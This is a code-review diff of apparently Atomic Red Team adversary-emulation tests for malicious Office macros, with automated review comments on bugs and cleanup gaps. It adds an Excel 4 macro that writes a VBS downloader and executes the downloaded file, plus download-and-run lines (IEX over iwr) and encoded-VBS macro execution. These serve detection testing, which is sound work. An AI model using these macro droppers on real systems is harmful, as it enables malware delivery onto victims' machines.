diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 3126ec14..7ae3b587 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -633,6 +633,7 @@ execution,T1204.002,Malicious File,2,OSTap Payload Download,3f3af983-118a-4fa1-8
execution,T1204.002,Malicious File,3,Maldoc choice flags command execution,0330a5d2-a45a-4272-a9ee-e364411c4b18,powershell
execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell
execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
+execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
@@ -661,6 +662,7 @@ execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a rem
execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
+execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index def25897..241e57a5 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -439,6 +439,7 @@ execution,T1204.002,Malicious File,2,OSTap Payload Download,3f3af983-118a-4fa1-8
execution,T1204.002,Malicious File,3,Maldoc choice flags command execution,0330a5d2-a45a-4272-a9ee-e364411c4b18,powershell
execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell
execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
+execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
@@ -465,6 +466,7 @@ execution,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c
execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
+execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index e328af02..51fb922f 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1090,6 +1090,7 @@
- Atomic Test #3: Maldoc choice flags command execution [windows]
- Atomic Test #4: OSTAP JS version [windows]
- Atomic Test #5: Office launching .bat file from AppData [windows]
+ - Atomic Test #6: Excel 4 Macro [windows]
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
@@ -1133,6 +1134,7 @@
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.005 Visual Basic](../../T1059.005/T1059.005.md)
- Atomic Test #1: Visual Basic script execution to gather local computer information [windows]
+ - Atomic Test #2: Encoded VBS code execution [windows]
- [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index fd9c685a..526d1b20 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -836,6 +836,7 @@
- Atomic Test #3: Maldoc choice flags command execution [windows]
- Atomic Test #4: OSTAP JS version [windows]
- Atomic Test #5: Office launching .bat file from AppData [windows]
+ - Atomic Test #6: Excel 4 Macro [windows]
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
@@ -875,6 +876,7 @@
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.005 Visual Basic](../../T1059.005/T1059.005.md)
- Atomic Test #1: Visual Basic script execution to gather local computer information [windows]
+ - Atomic Test #2: Encoded VBS code execution [windows]
- [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index b9f9becc..883f0a0c 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -40405,7 +40405,7 @@ discovery:
- linux
- macos
executor:
- command: 'username=$(echo $HOME | awk -F''/'' ''{print $3}'') && lsof -u $username
+ command: 'username=$(id -u -n) && lsof -u $username
'
name: sh
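Review bot: `lsof -u $username` on the new `+ command:` line leaves the expansion unquoted, and the intermediate variable adds nothing now that the value comes from a single command; `lsof -u "$(id -un)"` is the quoted one-step form. Replacing the awk over `$HOME` with `id` is the right fix, since the old expression assumed a two-level home directory layout; the quoting only brings the line in line with shell conventions. If index.yaml is generated from the per-technique atomic yaml, the change belongs in that source file.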
@@ -44322,35 +44322,30 @@ execution:
description: Maldoc application Word or Excel
type: String
default: Word
- ms_office_version:
- description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
- Default latest version.
- type: String
- default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
- -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
- | Sort-Object -desc)[0]
dependency_executor_name: powershell
dependencies:
- - description: 'Test Requires MS Office to be installed and have been run previously.
- Run -GetPrereqs to run msword and build dependant registry keys
+ - description: 'Microsoft #{ms_product} must be installed
'
prereq_command: |
- $ms_office_version = #{ms_office_version}
- If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
- get_prereq_command: |
- $msword = New-Object -ComObject word.application
- Stop-Process -Name WINWORD
+ try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
+ manually to meet this requirement"
+
+'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
- $ms_office_version = #{ms_office_version}
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n"
- Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
- cleanup_command: |
- if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
- $ms_office_version = #{ms_office_version}
- Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+ Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
+ cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore
+
+'
name: powershell
- name: OSTap Payload Download
auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80
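Review bot: The new `+ cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore` line drops the `Remove-ItemProperty ... -Name 'AccessVBOM'` step the removed lines performed, so if Invoke-MalDoc still enables "Trust access to the VBA project object model" to inject the macro (not visible in this diff), the host keeps that weakened Office setting after the test; unless the new Invoke-MalDoc is known to revert it, keep a version-agnostic revert such as `Get-ChildItem 'HKCU:\Software\Microsoft\Office' | ForEach-Object { Remove-ItemProperty -Path "$($_.PSPath)\#{ms_product}\Security" -Name AccessVBOM -ErrorAction Ignore }`. The same cleanup removal occurs in the hunks at -44388, -44433, -44473 and -55331. Separately, the new prereq_command's `Stop-Process -Name $process` terminates every running Word or Excel process on the host rather than the COM instance it just created, which can discard a user's unsaved documents; calling `.Quit()` on the created object is the non-destructive check, and the same applies to `Stop-Process -Name "Excel"` and `Stop-Process -Name "winword"` in the -44473 and -46107 hunks. If index.yaml is generated from the per-technique atomic yaml files, these fixes belong in those source files.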
@@ -44388,34 +44383,27 @@ execution:
description: Maldoc application Word or Excel
type: String
default: Word
- ms_office_version:
- description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
- Default latest version.
- type: String
- default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
- -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
- | Sort-Object -desc)[0]
dependency_executor_name: powershell
dependencies:
- - description: 'Test Requires MS Office to be installed and have been run previously.
- Run -GetPrereqs to run msword and build dependant registry keys
+ - description: 'Microsoft #{ms_product} must be installed
'
prereq_command: |
- $ms_office_version = #{ms_office_version}
- If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
- get_prereq_command: |
- $msword = New-Object -ComObject word.application
- Stop-Process -Name WINWORD
+ try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
+ manually to meet this requirement"
+
+'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
- $ms_office_version = #{ms_office_version}
$macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
- Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
- cleanup_command: |
- $ms_office_version = #{ms_office_version}
- Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+ Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
name: powershell
- name: OSTAP JS version
auto_generated_guid: add560ef-20d6-4011-a937-2c340f930911
@@ -44433,35 +44421,27 @@ execution:
description: Maldoc application Word or Excel
type: String
default: Word
- ms_office_version:
- description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
- Default latest version.
- type: String
- default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
- -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
- | Sort-Object -desc)
dependency_executor_name: powershell
dependencies:
- - description: 'Test Requires MS Office to be installed and have been run previously.
- Run -GetPrereqs to run msword and build dependant registry keys
+ - description: 'Microsoft #{ms_product} must be installed
'
prereq_command: |
- $ms_office_version = #{ms_office_version}
- If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
- get_prereq_command: |
- $msword = New-Object -ComObject word.application
- Stop-Process -Name WINWORD
+ try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
+ manually to meet this requirement"
+
+'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
- $ms_office_version = #{ms_office_version}
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
- Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
- cleanup_command: |
- $ms_office_version = #{ms_office_version}
- if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
- Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+ Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
name: powershell
- name: Office launching .bat file from AppData
auto_generated_guid: 9215ea92-1ded-41b7-9cd6-79f9a78397aa
@@ -44473,41 +44453,126 @@ execution:
bat_path:
description: Path to malicious .bat file
type: String
- default: $env:temp+"\art1204.bat"
- ms_office_version:
- description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
- Default latest version.
- type: string
- default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
- -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
- | Sort-Object -desc)[0]
+ default: $("$env:temp\art1204.bat")
ms_product:
description: Maldoc application Word or Excel
type: String
default: Word
dependency_executor_name: powershell
dependencies:
- - description: 'Test Requires MS Office to be installed and have been run previously.
- Run -GetPrereqs to run msword and build dependant registry keys
+ - description: 'Microsoft #{ms_product} must be installed
'
prereq_command: |
- $ms_office_version = #{ms_office_version}
- If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
- get_prereq_command: |
- $msword = New-Object -ComObject word.application
- Stop-Process -Name WINWORD
+ try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
+ manually to meet this requirement"
+
+'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
- $ms_office_version = #{ms_office_version}
- $bat_path = #{bat_path}
- $macrocode = " Open `"$bat_path`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
- Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
+ $macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
+ Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
+ name: powershell
+ - name: Excel 4 Macro
+ auto_generated_guid: 4ea1fc97-8a46-4b4e-ba48-af43d2a98052
+ description: |
+ This module creates an Excel 4 Macro (XLM) enabled spreadsheet and executes it. The XLM will first write a "malicious"
+ VBS file to %TEMP%, then execute this file. The VBS will download Process Explorer to the same directory (%TEMP%) and exec.
+
+ A note regarding this module. By default, this module will pull the current username from the system and places it into the macro. If
+ you'd like to utilize the "=GET.WORKSPACE(26)" method, that many maldoc authors use, you will need to ensure that the User Name associated
+ with Excel matches that of the local system. This username can be found under Files -> Options -> Username
+ supported_platforms:
+ - windows
+ input_arguments:
+ download_url:
+ description: Download URL
+ type: String
+ default: https://live.sysinternals.com/procexp.exe
+ uname:
+ description: Username for pathing
+ type: String
+ default: "$env:Username"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Microsoft Excel must be installed
+
+'
+ prereq_command: |
+ try {
+ New-Object -COMObject "Excel.Application" | Out-Null
+ Stop-Process -Name "Excel"
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft Excel
+ manually to meet this requirement"
+
+'
+ executor:
+ command: |
+ $fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs"
+ $fname1 = "$env:TEMP\procexp.exe"
+ if (Test-Path $fname) {
+ Remove-Item $fname
+ Remove-Item $fname1
+ }
+
+ $xlApp = New-Object -COMObject "Excel.Application"
+ $xlApp.Visible = $True
+ $xlApp.DisplayAlerts = $False
+ $xlBook = $xlApp.Workbooks.Add()
+ $sheet = $xlBook.Excel4MacroSheets.Add()
+
+ if ("#{uname}" -ne "") {
+ $sheet.Cells.Item(1,1) = "#{uname}"
+ } else {
+ $sheet.Cells.Item(1,1) = "=GET.WORKSPACE(26)"
+ }
+
+ $sheet.Cells.Item(2,1) = "procexp.exe"
+ $sheet.Cells.Item(3,1) = "atomic_redteam_x4m_exec.vbs"
+ $sheet.Cells.Item(4,1) = "=IF(ISNUMBER(SEARCH(`"64`",GET.WORKSPACE(1))), GOTO(A5),)"
+ $sheet.Cells.Item(5,1) = "=FOPEN(`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`", 3)"
+ $sheet.Cells.Item(6,1) = "=FWRITELN(A5, `"url = `"`"#{download_url}`"`"`")"
+ $sheet.Cells.Item(7,1) = "=FWRITELN(A5, `"`")"
+ $sheet.Cells.Item(8,1) = "=FWRITELN(A5, `"Set winHttp = CreateObject(`"`"WinHTTP.WinHTTPrequest.5.1`"`")`")"
+ $sheet.Cells.Item(9,1) = "=FWRITELN(A5, `"winHttp.Open `"`"GET`"`", url, False`")"
+ $sheet.Cells.Item(10,1) = "=FWRITELN(A5, `"winHttp.Send`")"
+ $sheet.Cells.Item(11,1) = "=FWRITELN(A5, `"If winHttp.Status = 200 Then`")"
+ $sheet.Cells.Item(12,1) = "=FWRITELN(A5, `"Set oStream = CreateObject(`"`"ADODB.Stream`"`")`")"
+ $sheet.Cells.Item(13,1) = "=FWRITELN(A5, `"oStream.Open`")"
+ $sheet.Cells.Item(14,1) = "=FWRITELN(A5, `"oStream.Type = 1`")"
+ $sheet.Cells.Item(15,1) = "=FWRITELN(A5, `"oStream.Write winHttp.responseBody`")"
+ $sheet.Cells.Item(16,1) = "=FWRITELN(A5, `"oStream.SaveToFile `"`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`"`", 2`")"
+ $sheet.Cells.Item(17,1) = "=FWRITELN(A5, `"oStream.Close`")"
+ $sheet.Cells.Item(18,1) = "=FWRITELN(A5, `"End If`")"
+ $sheet.Cells.Item(19,1) = "=FCLOSE(A5)"
+ $sheet.Cells.Item(20,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`")"
+ $sheet.Cells.Item(21,1) = "=WAIT(NOW()+`"00:00:05`")"
+ $sheet.Cells.Item(22,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`")"
+ $sheet.Cells.Item(23,1) = "=HALT()"
+ $sheet.Cells.Item(1,1).Name = "runme"
+ $xlApp.Run("runme")
+ $xlApp.Quit()
+
+ [System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlBook) | Out-Null
+ [System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlApp) | Out-Null
+ [System.GC]::Collect()
+ [System.GC]::WaitForPendingFinalizers()
+
+ Remove-Variable xlBook
+ Remove-Variable xlApp
cleanup_command: |
- $ms_office_version = #{ms_office_version}
- if (Test-Path (#{bat_path})) { Remove-Item (#{bat_path}) }
- Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+ Stop-Process -Name "procexp*" -ErrorAction Ignore
+ Remove-Item "$env:TEMP\atomic_redteam_x4m_exec.vbs" -ErrorAction Ignore
+ Remove-Item "$env:TEMP\procexp.exe" -ErrorAction Ignore
name: powershell
T1204.001:
technique:
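Review bot: On the new `$macrocode = " Open `"#{bat_path}`" ...` line of the "Office launching .bat file from AppData" test, the Shell call still interpolates `$bat_path`, but this hunk removes the `$bat_path = #{bat_path}` assignment above it, so the variable is now empty and the macro runs `cmd.exe /c ` with no target while the .bat is still written to `#{bat_path}`; change that part of the string to ``Shell(`"cmd.exe /c #{bat_path} `", vbNormalFocus)``. The following line's `-officeProduct #{ms_product}` is unquoted while every other Invoke-MalDoc call in this diff passes `"#{ms_product}"`; quote it for consistency. In the new "Excel 4 Macro" test, the `=FOPEN`, `=FWRITELN ... SaveToFile` and `=EXEC` cells hard-code `C:\Users\<uname>\AppData\Local\Temp\`, whereas `$fname`, `$fname1` and the cleanup_command use `$env:TEMP`, so on a host with a relocated profile or TEMP the macro writes and executes from a path the cleanup never touches; consider computing the directory from `$env:TEMP` in the script and writing it into a cell the formulas reference. Also `Remove-Item $fname1` runs inside `if (Test-Path $fname)` without its own existence check and emits an error when only the .vbs is present; `-ErrorAction Ignore`, as the cleanup_command already uses, fixes that.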
@@ -46107,11 +46172,46 @@ execution:
New-Item -ItemType Directory (Split-Path #{vbscript}) -Force | Out-Null
Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
executor:
- command: 'cscript #{vbscript} > $env:TEMP\out.txt'
+ command: 'cscript #{vbscript} > $env:TEMP\T1059.005.out.txt'
cleanup_command: |-
Remove-Item $env:TEMP\sys_info.vbs -ErrorAction Ignore
Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
name: powershell
+ - name: Encoded VBS code execution
+ auto_generated_guid: e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
+ description: |
+ This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution
+ a message box will pop up displaying "ART T1059.005"
+
+ A note regarding this module, due to the way that this module utilizes "ScriptControl" a 64bit version of Microsoft Office is required.
+ You can validate this by opening WinWord -> File -> Account -> About Word
+ supported_platforms:
+ - windows
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'The 64-bit version of Microsoft Office must be installed
+
+'
+ prereq_command: |
+ try {
+ $wdApp = New-Object -COMObject "Word.Application"
+ $path = $wdApp.Path
+ Stop-Process -Name "winword"
+ if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit)
+ manually to meet this requirement"
+
+'
+ executor:
+ command: |
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+ Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
+ cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine
+ -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
+
+'
+ name: powershell
T1059.003:
technique:
created: '2020-03-09T14:12:31.196Z'
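Review bot: The cleanup_command of the new "Encoded VBS code execution" test, `Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" }`, terminates every process on the host whose command line contains `mshta`, not just the one the macro spawns, so an unrelated mshta.exe (or any process that merely mentions it in its arguments) is killed as collateral. Narrow the match to the instance this test creates — the macrocode file is not in this diff, so the exact command line cannot be confirmed here, but filtering on the `ParentProcessId` of the Word process Invoke-Maldoc launches is one option — and replace the string-wrapped call with `ForEach-Object { Stop-Process -Id $_.ProcessId -ErrorAction Ignore }`. `Get-CimInstance Win32_Process` is the supported replacement for the deprecated `Get-WmiObject`. If index.yaml is generated from atomics/T1059.005/T1059.005.yaml, the change belongs there.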
@@ -55331,31 +55431,30 @@ initial-access:
description: Maldoc application Word or Excel
type: String
default: Word
- ms_office_version:
- description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office"
- type: String
- default: '16.0'
dependency_executor_name: powershell
dependencies:
- - description: 'Test Requires MS Office to be installed and have been run previously.
- Run -GetPrereqs to run msword and build dependent registry keys
+ - description: 'Microsoft #{ms_product} must be installed
'
- prereq_command: 'If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version})
- { exit 0 } else { exit 1 }
+ prereq_command: |
+ try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
+ manually to meet this requirement"
'
- get_prereq_command: |
- $msword = New-Object -ComObject word.application
- Stop-Process -Name WINWORD
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n"
- Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
- cleanup_command: |
- if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
- Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+ Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
+ cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore
+
+'
name: powershell
T1566.002:
technique:
diff --git a/atomics/T1059.005/T1059.005.md b/atomics/T1059.005/T1059.005.md
index 65026823..eae563f3 100644
--- a/atomics/T1059.005/T1059.005.md
+++ b/atomics/T1059.005/T1059.005.md
@@ -10,6 +10,8 @@ Adversaries may use VB payloads to execute malicious commands. Common malicious
- [Atomic Test #1 - Visual Basic script execution to gather local computer information](#atomic-test-1---visual-basic-script-execution-to-gather-local-computer-information)
+- [Atomic Test #2 - Encoded VBS code execution](#atomic-test-2---encoded-vbs-code-execution)
+
@@ -33,7 +35,7 @@ When successful, system information will be written to $env:TEMP\T1059.005.out.t
```powershell
-cscript #{vbscript} > $env:TEMP\out.txt
+cscript #{vbscript} > $env:TEMP\T1059.005.out.txt
```
#### Cleanup Commands:
@@ -60,4 +62,54 @@ Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
+
+
+
+## Atomic Test #2 - Encoded VBS code execution
+This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution
+a message box will pop up displaying "ART T1059.005"
+
+A note regarding this module, due to the way that this module utilizes "ScriptControl" a 64bit version of Microsoft Office is required.
+You can validate this by opening WinWord -> File -> Account -> About Word
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
+```
+
+#### Cleanup Commands:
+```powershell
+Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The 64-bit version of Microsoft Office must be installed
+##### Check Prereq Commands:
+```powershell
+try {
+ $wdApp = New-Object -COMObject "Word.Application"
+ $path = $wdApp.Path
+ Stop-Process -Name "winword"
+ if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
+} catch { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
+```
+
+
+
+
diff --git a/atomics/T1059.005/T1059.005.yaml b/atomics/T1059.005/T1059.005.yaml
index bdff9ad0..d4a38b2b 100644
--- a/atomics/T1059.005/T1059.005.yaml
+++ b/atomics/T1059.005/T1059.005.yaml
@@ -23,13 +23,13 @@ atomic_tests:
New-Item -ItemType Directory (Split-Path #{vbscript}) -Force | Out-Null
Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
executor:
- command: 'cscript #{vbscript} > $env:TEMP\out.txt'
